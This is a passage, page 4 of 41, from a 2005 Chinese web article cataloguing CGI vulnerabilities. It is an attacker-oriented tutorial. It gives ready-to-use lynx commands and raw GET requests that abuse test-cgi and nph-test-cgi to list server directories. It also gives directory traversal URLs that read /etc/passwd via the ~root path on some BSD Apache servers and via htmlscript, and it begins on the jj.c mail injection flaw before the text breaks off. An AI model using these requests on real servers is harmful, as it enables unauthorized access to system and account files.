CGI漏洞

作者: 来源:网络文章时间:2005-12-17 23:57:43

CGI漏洞(4) GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
得到一些http的目录

lynx http://www.victim.com/cgi-bin/test-cgi?&#0...t%20/etc/passwd
这招好象并不管用.
lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
还可以这样试
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *

十六.对于某些BSD的apache可以:

lynx http://www.victim.com/root/etc/passwd
lynx http://www.victim.com/~root/etc/passwd

十七.htmlscript

lynx http://www.victim.com/cgi-bin/htmlscript?...../../etc/passwd

十八.jj.c

The demo cgi program jj.c calls /bin/mail without filtering user

1.CGI漏洞(1)
2.CGI漏洞(2)
3.CGI漏洞(3)
4.CGI漏洞(4)
5.CGI漏洞(5)
6.CGI漏洞(6)
7.CGI漏洞(7)
8.CGI漏洞(8)
9.CGI漏洞(9)
10.CGI漏洞(10)
11.CGI漏洞(11)
12.CGI漏洞(12)
13.CGI漏洞(13)
14.CGI漏洞(14)
15.CGI漏洞(15)
16.CGI漏洞(16)
17.CGI漏洞(17)
18.CGI漏洞(18)
19.CGI漏洞(19)
20.CGI漏洞(20)
21.CGI漏洞(21)
22.CGI漏洞(22)
23.CGI漏洞(23)
24.CGI漏洞(24)
25.CGI漏洞(25)
26.CGI漏洞(26)
27.CGI漏洞(27)
28.CGI漏洞(28)
29.CGI漏洞(29)
30.CGI漏洞(30)
31.CGI漏洞(31)
32.CGI漏洞(32)
33.CGI漏洞(33)
34.CGI漏洞(34)
35.CGI漏洞(35)
36.CGI漏洞(36)
37.CGI漏洞(37)
38.CGI漏洞(38)
39.CGI漏洞(39)
40.CGI漏洞(40)
41.CGI漏洞(41)

共41页 9 7 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] [26] [27] [28] [29] [30] [31] [32] [33] [34] [35] [36] [37] [38] [39] [40] [41] 8 :>

CGI漏洞相关文章：

CGI漏洞相关软件：

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员，我们尽快予以更正。
转载请注明来源：http://www.xgdown.com